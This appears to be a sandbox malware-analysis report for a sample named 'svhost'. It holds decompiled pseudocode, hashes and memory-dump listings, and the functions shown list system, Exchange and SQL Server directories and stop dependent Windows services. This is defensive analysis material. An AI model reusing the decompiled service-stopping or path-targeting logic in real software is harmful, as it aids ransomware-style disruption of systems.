                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                      • Instruction ID: 2ee7f04577c01638032b55b4dfd9e8e3cba6370e44039f0a894ca4db3415daae
                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                      • Instruction Fuzzy Hash: 39112B7760418143D614866ED9B45B7E7A5EBCF328F2C63FAD0826F758D222F945D500
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			/* Reads the PEB through fs:[0x30] and its ProcessParameters block (PEB+0x10).
                                      			   If the dword at offset 8 of that block has its sign bit set, returns 1;
                                      			   otherwise calls E00EB146F on it and returns 1 unless that call set _v8 to 1. */
                                      			E00EB28E5(void* __ecx) {
                                      				char _v8;
                                      				intOrPtr _t7;
                                      				char _t13;
                                      				intOrPtr _t16;	/* declaration missing from the decompiler output */
                                      
                                      				_t13 = 0;
                                      				_v8 = 0;
                                      				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                      				_t16 =  *((intOrPtr*)(_t7 + 8));
                                      				if( *((intOrPtr*)(_t7 + 8)) < 0) {
                                      					L2:
                                      					_t13 = 1;
                                      				} else {
                                      					E00EB146F(_t16,  &_v8);
                                      					if(_v8 != 1) {
                                      						goto L2;
                                      					}
                                      				}
                                      				return _t13;
                                      			}

                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f2504916e9dbb32d5e81137e3abe5a7a96d5e8bc48755024bb8a79154df76512
                                      • Instruction ID: 45b9d3fed89689b63d9706020644feb940f5fc80a9af451e7233d77f424518d8
                                      • Opcode Fuzzy Hash: f2504916e9dbb32d5e81137e3abe5a7a96d5e8bc48755024bb8a79154df76512
                                      • Instruction Fuzzy Hash: 0EE08C32911228EBCB14DBC8C904D8BF3FCEB84B55F1100AABA05E3100C670DE00D7D0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 94%
                                      			/* Fills two path lists on the object passed in __ecx: the list at offset 0 with
                                      			   system directories derived from environment variables (ALLUSERSPROFILE,
                                      			   USERPROFILE\AppData, ProgramData, WINDIR, PROGRAMFILES(x86), SYSTEMDRIVE\...),
                                      			   and the list at offset 0xc with the Exchange Server and SQL Server install
                                      			   directories under SYSTEMDRIVE. From the call pattern, E00E57CD0 appears to read
                                      			   an environment variable into a string, E00E67CE0/E00E68360 to build the path,
                                      			   E00E61E50 to append it to the list and E00E57B40 to free the temporaries.
                                      			   The function sets up an SEH frame ([fs:0]) and a /GS stack cookie (0xeef074),
                                      			   which E00E89A35 verifies on return. */
                                      			E00E67290(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v21;
                                      				intOrPtr _v28;
                                      				char _v29;
                                      				char _v56;
                                      				char _v80;
                                      				char _v104;
                                      				char _v128;
                                      				char _v152;
                                      				char _v176;
                                      				char _v200;
                                      				char _v224;
                                      				char _v248;
                                      				char _v272;
                                      				char _v296;
                                      				char _v320;
                                      				char _v344;
                                      				char _v368;
                                      				char _v392;
                                      				char _v416;
                                      				char _v440;
                                      				char _v464;
                                      				char _v488;
                                      				char _v512;
                                      				char _v536;
                                      				char _v560;
                                      				char _v584;
                                      				char _v608;
                                      				char _v632;
                                      				char _v656;
                                      				char _v680;
                                      				char _v704;
                                      				char _v728;
                                      				char _v752;
                                      				char _v776;
                                      				char _v800;
                                      				char _v824;
                                      				char _v848;
                                      				char _v872;
                                      				char _v896;
                                      				char _v920;
                                      				char _v944;
                                      				char _v968;
                                      				char _v992;
                                      				char _v1016;
                                      				char _v1040;
                                      				char _v1064;
                                      				char _v1088;
                                      				signed int _t152;
                                      				signed int _t153;
                                      				void* _t284;	/* saved __ebx; declaration missing from the decompiler output */
                                      				void* _t424;	/* saved __edi; declaration missing from the decompiler output */
                                      				void* _t425;	/* saved __esi; declaration missing from the decompiler output */
                                      				signed int _t426;
                                      				void* _t443;
                                      
                                      				_t443 = __eflags;
                                      				_t425 = __esi;
                                      				_t424 = __edi;
                                      				_t284 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xec10f0);
                                      				_push( *[fs:0x0]);
                                      				_t152 =  *0xeef074; // 0x221cac15
                                      				_t153 = _t152 ^ _t426;
                                      				_v20 = _t153;
                                      				_push(_t153);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v28 = __ecx;
                                      				E00E566A0(_v28);
                                      				E00E566A0(_v28 + 0xc);
                                      				_v29 = 0;
                                      				E00E679C0(__ebx, _v28, __edi, __esi, "$");
                                      				E00E57CD0(__ebx,  &_v56, __edi, __esi, _t443, L"ALLUSERSPROFILE");
                                      				E00E61E50(_v28, E00E67CE0(__ebx, _v28, __edi, __esi,  &_v440,  &_v56));
                                      				E00E57B40( &_v440);
                                      				E00E57B40( &_v56);
                                      				E00E57CD0(_t284,  &_v80, _t424, _t425, _t443, L"USERPROFILE");
                                      				E00E61E50(_v28, E00E68360(_t284, _v28, _t424, _t425, _t443,  &_v464, E00E67CE0(_t284, _v28, _t424, _t425,  &_v488,  &_v80), L"\\AppData"));
                                      				E00E57B40( &_v464);
                                      				E00E57B40( &_v488);
                                      				E00E57B40( &_v80);
                                      				E00E57CD0(_t284,  &_v104, _t424, _t425, _t443, L"ProgramData");
                                      				E00E61E50(_v28, E00E67CE0(_t284, _v28, _t424, _t425,  &_v512,  &_v104));
                                      				E00E57B40( &_v512);
                                      				E00E57B40( &_v104);
                                      				E00E57CD0(_t284,  &_v128, _t424, _t425, _t443, L"WINDIR");
                                      				E00E61E50(_v28, E00E67CE0(_t284, _v28, _t424, _t425,  &_v536,  &_v128));
                                      				E00E57B40( &_v536);
                                      				E00E57B40( &_v128);
                                      				E00E57CD0(_t284,  &_v152, _t424, _t425, _t443, L"PROGRAMFILES(x86)");
                                      				E00E61E50(_v28, E00E67CE0(_t284, _v28, _t424, _t425,  &_v560,  &_v152));
                                      				E00E57B40( &_v560);
                                      				E00E57B40( &_v152);
                                      				E00E57CD0(_t284,  &_v176, _t424, _t425, _t443, L"SYSTEMDRIVE");
                                      				E00E61E50(_v28, E00E68360(_t284, _v28, _t424, _t425, _t443,  &_v584, E00E67CE0(_t284, _v28, _t424, _t425,  &_v608,  &_v176), L"\\Program Files"));
                                      				E00E57B40( &_v584);
                                      				E00E57B40( &_v608);
                                      				E00E57B40( &_v176);
                                      				E00E57CD0(_t284,  &_v200, _t424, _t425, _t443, L"SYSTEMDRIVE");
                                      				E00E61E50(_v28, E00E68360(_t284, _v28, _t424, _t425, _t443,  &_v632, E00E67CE0(_t284, _v28, _t424, _t425,  &_v656,  &_v200), L"\\AppData"));
                                      				E00E57B40( &_v632);
                                      				E00E57B40( &_v656);
                                      				E00E57B40( &_v200);
                                      				E00E57CD0(_t284,  &_v224, _t424, _t425, _t443, L"SYSTEMDRIVE");
                                      				E00E61E50(_v28, E00E68360(_t284, _v28, _t424, _t425, _t443,  &_v680, E00E67CE0(_t284, _v28, _t424, _t425,  &_v704,  &_v224), L"\\Application Data"));
                                      				E00E57B40( &_v680);
                                      				E00E57B40( &_v704);
                                      				E00E57B40( &_v224);
                                      				E00E57CD0(_t284,  &_v248, _t424, _t425, _t443, 0xed8ec4);
                                      				E00E61E50(_v28, E00E68360(_t284, _v28, _t424, _t425, _t443,  &_v728, E00E67CE0(_t284, _v28, _t424, _t425,  &_v752,  &_v248), 0xed8eb4));
                                      				E00E57B40( &_v728);
                                      				E00E57B40( &_v752);
                                      				E00E57B40( &_v248);
                                      				E00E57CD0(_t284,  &_v272, _t424, _t425, _t443, 0xee0bfc);
                                      				E00E61E50(_v28, E00E68360(_t284, _v28, _t424, _t425, _t443,  &_v776, E00E67CE0(_t284, _v28, _t424, _t425,  &_v800,  &_v272), 0xedcd64));
                                      				E00E57B40( &_v776);
                                      				E00E57B40( &_v800);
                                      				E00E57B40( &_v272);
                                      				E00E57CD0(_t284,  &_v296, _t424, _t425, _t443, L"SYSTEMDRIVE");
                                      				E00E61E50(_v28, E00E68360(_t284, _v28, _t424, _t425, _t443,  &_v824, E00E67CE0(_t284, _v28, _t424, _t425,  &_v848,  &_v296), L"\\Users\\All Users"));
                                      				E00E57B40( &_v824);
                                      				E00E57B40( &_v848);
                                      				E00E57B40( &_v296);
                                      				E00E57CD0(_t284,  &_v320, _t424, _t425, _t443, L"SYSTEMDRIVE");
                                      				E00E61E50(_v28, E00E68360(_t284, _v28, _t424, _t425, _t443,  &_v872, E00E67CE0(_t284, _v28, _t424, _t425,  &_v896,  &_v320), L"\\Windows"));
                                      				E00E57B40( &_v872);
                                      				E00E57B40( &_v896);
                                      				E00E57B40( &_v320);
                                      				E00E57CD0(_t284,  &_v344, _t424, _t425, _t443, L"SYSTEMDRIVE");
                                      				E00E61E50(_v28 + 0xc, E00E68360(_t284, _v28, _t424, _t425, _t443,  &_v920, E00E67CE0(_t284, _v28, _t424, _t425,  &_v944,  &_v344), L"\\Program Files\\Microsoft\\Exchange Server"));
                                      				E00E57B40( &_v920);
                                      				E00E57B40( &_v944);
                                      				E00E57B40( &_v344);
                                      				E00E57CD0(_t284,  &_v368, _t424, _t425, _t443, L"SYSTEMDRIVE");
                                      				E00E61E50(_v28 + 0xc, E00E68360(_t284, _v28, _t424, _t425, _t443,  &_v968, E00E67CE0(_t284, _v28, _t424, _t425,  &_v992,  &_v368), L"\\Program Files (x86)\\Microsoft\\Exchange Server"));
                                      				E00E57B40( &_v968);
                                      				E00E57B40( &_v992);
                                      				E00E57B40( &_v368);
                                      				E00E57CD0(_t284,  &_v392, _t424, _t425, _t443, L"SYSTEMDRIVE");
                                      				E00E61E50(_v28 + 0xc, E00E68360(_t284, _v28, _t424, _t425, _t443,  &_v1016, E00E67CE0(_t284, _v28, _t424, _t425,  &_v1040,  &_v392), L"\\Program Files\\Microsoft SQL Server"));
                                      				E00E57B40( &_v1016);
                                      				E00E57B40( &_v1040);
                                      				E00E57B40( &_v392);
                                      				E00E57CD0(_t284,  &_v416, _t424, _t425, _t443, L"SYSTEMDRIVE");
                                      				E00E61E50(_v28 + 0xc, E00E68360(_t284, _v28, _t424, _t425, _t443,  &_v1064, E00E67CE0(_t284, _v28, _t424, _t425,  &_v1088,  &_v416), L"\\Program Files (x86)\\Microsoft SQL Server"));
                                      				E00E57B40( &_v1064);
                                      				E00E57B40( &_v1088);
                                      				E00E57B40( &_v416);
                                      				E00E678F0(_t284,  &_v21, _t424, _t425, E00E51650(_v28));
                                      				E00E678F0(_t284,  &_v21, _t424, _t425, E00E51650(_v28 + 0xc));
                                      				 *[fs:0x0] = _v16;
                                      				return E00E89A35(_t284, _v20 ^ _t426,  &_v1064, _t424, _t425);
                                      			}

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task$std::ios_base::good$Affinity::operator!=Concurrency::details::EnvironmentHardwareMutex_baseMutex_base::~_Variablestd::_
                                      • String ID: PROGRAMFILES(x86)$ProgramData$SYSTEMDRIVE$SYSTEMDRIVE$SYSTEMDRIVE$SYSTEMDRIVE$SYSTEMDRIVE$SYSTEMDRIVE$SYSTEMDRIVE$SYSTEMDRIVE$SYSTEMDRIVE$USERPROFILE$WINDIR$\AppData$\AppData$\Application Data$\Program Files$\Program Files (x86)\Microsoft SQL Server$\Program Files (x86)\Microsoft\Exchange Server$\Program Files\Microsoft SQL Server$\Program Files\Microsoft\Exchange Server$\Users\All Users$\Windows$hd.
                                      • API String ID: 2830044558-2025937393
                                      • Opcode ID: adf73313867445dd7de305e6ad7a30504376cdaba61f0329ba29f2a18519d157
                                      • Instruction ID: f540ea5b3cb252279b466944bbcfa1df19105cb6e0a7e3b91c3f334bda12e521
                                      • Opcode Fuzzy Hash: adf73313867445dd7de305e6ad7a30504376cdaba61f0329ba29f2a18519d157
                                      • Instruction Fuzzy Hash: A1F13D719541189BCB14FB60EDA3EEEB3BAAF14340F4065D9B54A72192DF306B98CF60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 94%
                                      			E00E63B30(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, signed char* _a8, char _a12) {
                                      				signed int _v8;
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v44;
                                      				char _v68;
                                      				char _v72;
                                      				intOrPtr _v76;
                                      				signed int _v80;
                                      				intOrPtr _v84;
                                      				intOrPtr _v88;
                                      				signed char* _v92;
                                      				signed int _v96;
                                      				signed int _v100;
                                      				char _v104;
                                      				char _v116;
                                      				char _v128;
                                      				signed int _t100;
                                      				signed int _t101;
                                      				signed int _t116;
                                      				void* _t130;
                                      				void* _t147;
                                      				intOrPtr _t151;
                                      				signed int _t157;
                                      				intOrPtr _t172;
                                      				intOrPtr _t193;
                                      				signed int _t205;
                                      				void* _t206;
                                      				void* _t207;
                                      				signed int _t208;
                                      
                                      				_t207 = __esi;
                                      				_t206 = __edi;
                                      				_t147 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xec0f50);
                                      				_push( *[fs:0x0]);
                                      				_t100 =  *0xeef074; // 0x221cac15
                                      				_t101 = _t100 ^ _t208;
                                      				_v20 = _t101;
                                      				_push(_t101);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v76 = __ecx;
                                      				_v80 = 0;
                                      				E00E57D70( &_v44);
                                      				_v8 = 0;
                                      				E00E57D70( &_v68);
                                      				_v8 = 1;
                                      				_v92 = _a8;
                                      				_t151 = _v76;
                                      				_t194 =  *(_t151 + 0x48) & 0x000000ff;
                                      				if(( *(_t151 + 0x48) & 0x000000ff) == 0) {
                                      					_v100 = 0;
                                      					_v96 = 0;
                                      					_t193 = _v76;
                                      					_t194 = _v100;
                                      					 *(_t193 + 0x40) = _v100;
                                      					 *((intOrPtr*)(_t193 + 0x44)) = _v96;
                                      				}
                                      				E00E591C0( &_v44, _t206, _t207, 8, 0);
                                      				 *(_v76 + 0x4c) = 0;
                                      				while(1) {
                                      					_t28 =  &_a12; // 0xe62a27
                                      					if(_a8 ==  *_t28) {
                                      						break;
                                      					}
                                      					_v84 = E00E5A440(E00E64220( &_v44,  &_v104));
                                      					_t116 = E00E57A20( &_v44);
                                      					_t39 =  &_a12; // 0xe62a27
                                      					_v88 = E00E61310( *((intOrPtr*)(_v76 + 4)), _v76 + 0x40, _a8,  *_t39,  &_a8, _v84, _v84 + _t116 * 2,  &_v72);
                                      					if(_v88 < 0) {
                                      						L22:
                                      						_t172 = _v76;
                                      						_t194 =  *(_t172 + 0x4a) & 0x000000ff;
                                      						_t217 =  *(_t172 + 0x4a) & 0x000000ff;
                                      						if(( *(_t172 + 0x4a) & 0x000000ff) == 0) {
                                      							E00E60E80( &_v128, "bad conversion");
                                      							E00EA0C81( &_v128, 0xeedb3c);
                                      							goto L25;
                                      						} else {
                                      							E00E57DE0(_t147, _a4, _t206, _t207, _t217, _v76 + 0x28);
                                      							_v80 = _v80 | 0x00000001;
                                      							_v8 = 0;
                                      							E00E57B40( &_v68);
                                      							_v8 = 0xffffffff;
                                      							E00E57B40( &_v44);
                                      						}
                                      					} else {
                                      						if(_v88 <= 1) {
                                      							__eflags = _v84 - _v72;
                                      							if(_v84 >= _v72) {
                                      								_t130 = E00E57A20( &_v44);
                                      								__eflags = _t130 - 0x10;
                                      								if(_t130 >= 0x10) {
                                      									__eflags =  *(_v76 + 0x4a) & 0x000000ff;
                                      									if(__eflags == 0) {
                                      										E00E60E80( &_v116, "bad conversion");
                                      										E00EA0C81( &_v116, 0xeedb3c);
                                      										goto L16;
                                      									} else {
                                      										_t194 = _v76 + 0x28;
                                      										E00E57DE0(_t147, _a4, _t206, _t207, __eflags, _v76 + 0x28);
                                      										_v80 = _v80 | 0x00000001;
                                      										_v8 = 0;
                                      										E00E57B40( &_v68);
                                      										_v8 = 0xffffffff;
                                      										E00E57B40( &_v44);
                                      									}
                                      								} else {
                                      									E00E591C0( &_v44, _t206, _t207, 8, 0);
                                      									goto L16;
                                      								}
                                      							} else {
                                      								asm("lfence");
                                      								E00E64290(_t147,  &_v68, _t206, _t207, _v84, _v72 - _v84 >> 1);
                                      								L16:
                                      								goto L25;
                                      							}
                                      						} else {
                                      							if(_v88 == 3) {
                                      								while(1) {
                                      									_t72 =  &_a12; // 0xe62a27
                                      									__eflags = _a8 -  *_t72;
                                      									if(_a8 ==  *_t72) {
                                      										break;
                                      									}
                                      									E00E63180(_t147,  &_v68, _t206, _t207,  *_a8 & 0xff);
                                      									_t205 =  &(_a8[1]);
                                      									__eflags = _t205;
                                      									_a8 = _t205;
                                      								}
                                      								L25:
                                      								_t194 = _a8 - _v92;
                                      								__eflags = _t194;
                                      								 *(_v76 + 0x4c) = _t194;
                                      								continue;
                                      							} else {
                                      								goto L22;
                                      							}
                                      						}
                                      					}
                                      					L27:
                                      					 *[fs:0x0] = _v16;
                                      					_t98 =  &_v20; // 0xe62a27
                                      					return E00E89A35(_t147,  *_t98 ^ _t208, _t194, _t206, _t207);
                                      				}
                                      				E00E57BA0(_a4,  &_v68);
                                      				_t157 = _v80 | 0x00000001;
                                      				__eflags = _t157;
                                      				_v80 = _t157;
                                      				_v8 = 0;
                                      				E00E57B40( &_v68);
                                      				_v8 = 0xffffffff;
                                      				E00E57B40( &_v44);
                                      				goto L27;
                                      			}

                                      0x00e63b30
                                      0x00e63b30
                                      0x00e63b30
                                      0x00e63b33
                                      0x00e63b35
                                      0x00e63b40
                                      0x00e63b44
                                      0x00e63b49
                                      0x00e63b4b
                                      0x00e63b4e
                                      0x00e63b52
                                      0x00e63b58
                                      0x00e63b5b
                                      0x00e63b65
                                      0x00e63b6a
                                      0x00e63b74
                                      0x00e63b79
                                      0x00e63b80
                                      0x00e63b83
                                      0x00e63b86
                                      0x00e63b8c
                                      0x00e63b90
                                      0x00e63b93
                                      0x00e63b96
                                      0x00e63b99
                                      0x00e63b9c
                                      0x00e63ba2
                                      0x00e63ba2
                                      0x00e63bac
                                      0x00e63bb4
                                      0x00e63bc9
                                      0x00e63bcc
                                      0x00e63bcf
                                      0x00000000
                                      0x00000000
                                      0x00e63be8
                                      0x00e63bf2
                                      0x00e63c06
                                      0x00e63c20
                                      0x00e63c27
                                      0x00e63d11
                                      0x00e63d11
                                      0x00e63d14
                                      0x00e63d18
                                      0x00e63d1a
                                      0x00e63d5e
                                      0x00e63d6c
                                      0x00000000
                                      0x00e63d1c
                                      0x00e63d26
                                      0x00e63d31
                                      0x00e63d34
                                      0x00e63d3b
                                      0x00e63d40
                                      0x00e63d4a
                                      0x00e63d4f
                                      0x00e63c2d
                                      0x00e63c31
                                      0x00e63c45
                                      0x00e63c48
                                      0x00e63c67
                                      0x00e63c6c
                                      0x00e63c6f
                                      0x00e63c86
                                      0x00e63c88
                                      0x00e63ccf
                                      0x00e63cdd
                                      0x00000000
                                      0x00e63c8a
                                      0x00e63c8d
                                      0x00e63c94
                                      0x00e63c9f
                                      0x00e63ca2
                                      0x00e63ca9
                                      0x00e63cae
                                      0x00e63cb8
                                      0x00e63cbd
                                      0x00e63c71
                                      0x00e63c78
                                      0x00000000
                                      0x00e63c78
                                      0x00e63c4a
                                      0x00e63c4a
                                      0x00e63c5d
                                      0x00e63ce2
                                      0x00000000
                                      0x00e63ce2
                                      0x00e63c33
                                      0x00e63c37
                                      0x00e63cf2
                                      0x00e63cf5
                                      0x00e63cf5
                                      0x00e63cf8
                                      0x00000000
                                      0x00000000
                                      0x00e63d08
                                      0x00e63cec
                                      0x00e63cec
                                      0x00e63cef
                                      0x00e63cef
                                      0x00e63d71
                                      0x00e63bc0
                                      0x00e63bc0
                                      0x00e63bc6
                                      0x00000000
                                      0x00e63c3d
                                      0x00000000
                                      0x00e63c3d
                                      0x00e63c37
                                      0x00e63c31
                                      0x00e63da9
                                      0x00e63dac
                                      0x00e63db4
                                      0x00e63dc1
                                      0x00e63dc1
                                      0x00e63d7d
                                      0x00e63d85
                                      0x00e63d85
                                      0x00e63d88
                                      0x00e63d8b
                                      0x00e63d92
                                      0x00e63d97
                                      0x00e63da1
                                      0x00000000

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task$codecvt
                                      • String ID: '*$'*$bad conversion
                                      • API String ID: 882727733-1417368232
                                      • Opcode ID: f8e28995a02dacca22654ec48ae5a7e673fde936aa4c7c0862b6bd09a90d84a0
                                      • Instruction ID: 275c3495373549b4376d8a30f8fdb67368bea0987744062c237007a93befdbf9
                                      • Opcode Fuzzy Hash: f8e28995a02dacca22654ec48ae5a7e673fde936aa4c7c0862b6bd09a90d84a0
                                      • Instruction Fuzzy Hash: 67815D31A04248DFCB04DFA4D891AEEFBB1FF44354F24A55DE816BB291DB31AA46CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 77%
                                      			E00E6EF60(intOrPtr __ecx, void* __edx, void* _a4, void* _a8, char _a12) {
                                      				int _v8;
                                      				signed int _v12;
                                      				char _v20;
                                      				signed int _v32;
                                      				int _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				intOrPtr _v52;
                                      				intOrPtr _v56;
                                      				intOrPtr _v60;
                                      				intOrPtr _v64;
                                      				intOrPtr _v68;
                                      				struct _SERVICE_STATUS _v72;
                                      				int _v76;
                                      				void* _v80;
                                      				signed int _v84;
                                      				void* _v88;
                                      				long _v92;
                                      				intOrPtr _v96;
                                      				void _v132;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* __ebp;
                                      				signed int _t62;
                                      				signed int _t63;
                                      				int* _t83;
                                      				long _t84;
                                      				void* _t87;
                                      				void* _t109;
                                      				void* _t114;
                                      				signed int _t117;
                                      				void* _t118;
                                      				void* _t119;
                                      
                                      				_push(0xfffffffe);
                                      				_push(0xeeaa58);
                                      				_push(0xebf9ba);
                                      				_push( *[fs:0x0]);
                                      				_t119 = _t118 + 0xffffff90;
                                      				_t62 =  *0xeef074; // 0x221cac15
                                      				_v12 = _v12 ^ _t62;
                                      				_t63 = _t62 ^ _t117;
                                      				_v32 = _t63;
                                      				_push(_t63);
                                      				_t4 =  &_v20; // 0xe6ee48
                                      				 *[fs:0x0] = _t4;
                                      				_v96 = __ecx;
                                      				if(_a8 != 0) {
                                      					_v76 = 0;
                                      					_v36 = 0;
                                      					_v80 = 0;
                                      					_v72 = 0;
                                      					_v68 = 0;
                                      					_v64 = 0;
                                      					_v60 = 0;
                                      					_v56 = 0;
                                      					_v52 = 0;
                                      					_v48 = 0;
                                      					_v44 = 0;
                                      					_v40 = 0;
                                      					_v92 = GetTickCount();
                                      					if(EnumDependentServicesW(_a8, 1, _v80, 0,  &_v76,  &_v36) == 0) {
                                      						if(GetLastError() == 0xea) {
                                      							_t104 = _v76;
                                      							_v80 = HeapAlloc(GetProcessHeap(), 8, _v76);
                                      							if(_v80 != 0) {
                                      								_v8 = 0;
                                      								_t104 = _v76;
                                      								if(EnumDependentServicesW(_a8, 1, _v80, _v76,  &_v76,  &_v36) != 0) {
                                      									_v84 = 0;
                                      									while(_v84 < _v36) {
                                      										memcpy( &_v132,  &(_v80[_v84]), 9 << 2);
                                      										_t119 = _t119 + 0xc;
                                      										_t104 = _a4;
                                      										_v88 = OpenServiceW(_a4, _v132, 0x24);
                                      										if(_v88 != 0) {
                                      											_v8 = 1;
                                      											if(ControlService(_v88, 1,  &_v72) != 0) {
                                      												while(_v68 != 1) {
                                      													_t50 =  &_a12; // 0xe6ee48
                                      													Sleep( *_t50);
                                      													_t83 =  &_v76;
                                      													__imp__QueryServiceStatusEx(_v88, 0,  &_v72, 0x24, _t83);
                                      													if(_t83 != 0) {
                                      														if(_v68 != 1) {
                                      															_t84 = GetTickCount();
                                      															_t56 =  &_a12; // 0xe6ee48
                                      															if(_t84 - _v92 <=  *_t56) {
                                      																continue;
                                      															} else {
                                      															}
                                      														} else {
                                      														}
                                      													} else {
                                      													}
                                      													goto L25;
                                      												}
                                      											} else {
                                      											}
                                      											L25:
                                      											_v8 = 0;
                                      											E00E6F121();
                                      											_t104 = _v84 + 1;
                                      											_v84 = _v84 + 1;
                                      											continue;
                                      										} else {
                                      										}
                                      										goto L27;
                                      									}
                                      								} else {
                                      								}
                                      								L27:
                                      								_v8 = 0xfffffffe;
                                      								E00E6F13F();
                                      							} else {
                                      							}
                                      						} else {
                                      						}
                                      					} else {
                                      					}
                                      				} else {
                                      				}
                                      				_t59 =  &_v20; // 0xe6ee48
                                      				 *[fs:0x0] =  *_t59;
                                      				_pop(_t109);
                                      				_pop(_t114);
                                      				_pop(_t87);
                                      				return E00E89A35(_t87, _v32 ^ _t117, _t104, _t109, _t114);
                                      			}

                                      0x00e6ef63
                                      0x00e6ef65
                                      0x00e6ef6a
                                      0x00e6ef75
                                      0x00e6ef76
                                      0x00e6ef79
                                      0x00e6ef7e
                                      0x00e6ef81
                                      0x00e6ef83
                                      0x00e6ef89
                                      0x00e6ef8a
                                      0x00e6ef8d
                                      0x00e6ef93
                                      0x00e6ef9a
                                      0x00e6efa1
                                      0x00e6efa8
                                      0x00e6efaf
                                      0x00e6efb8
                                      0x00e6efbb
                                      0x00e6efbe
                                      0x00e6efc1
                                      0x00e6efc4
                                      0x00e6efc7
                                      0x00e6efca
                                      0x00e6efcd
                                      0x00e6efd0
                                      0x00e6efd9
                                      0x00e6eff8
                                      0x00e6f00f
                                      0x00e6f016
                                      0x00e6f029
                                      0x00e6f030
                                      0x00e6f037
                                      0x00e6f046
                                      0x00e6f05c
                                      0x00e6f063
                                      0x00e6f075
                                      0x00e6f090
                                      0x00e6f090
                                      0x00e6f098
                                      0x00e6f0a2
                                      0x00e6f0a9
                                      0x00e6f0b0
                                      0x00e6f0c9
                                      0x00e6f0cd
                                      0x00e6f0d3
                                      0x00e6f0d7
                                      0x00e6f0dd
                                      0x00e6f0ed
                                      0x00e6f0f5
                                      0x00e6f0fd
                                      0x00e6f101
                                      0x00e6f10a
                                      0x00e6f10d
                                      0x00000000
                                      0x00000000
                                      0x00e6f10f
                                      0x00000000
                                      0x00e6f0ff
                                      0x00000000
                                      0x00e6f0f7
                                      0x00000000
                                      0x00e6f0f5
                                      0x00000000
                                      0x00e6f0cb
                                      0x00e6f113
                                      0x00e6f113
                                      0x00e6f11a
                                      0x00e6f06f
                                      0x00e6f072
                                      0x00000000
                                      0x00000000
                                      0x00e6f0ab
                                      0x00000000
                                      0x00e6f0a9
                                      0x00000000
                                      0x00e6f05e
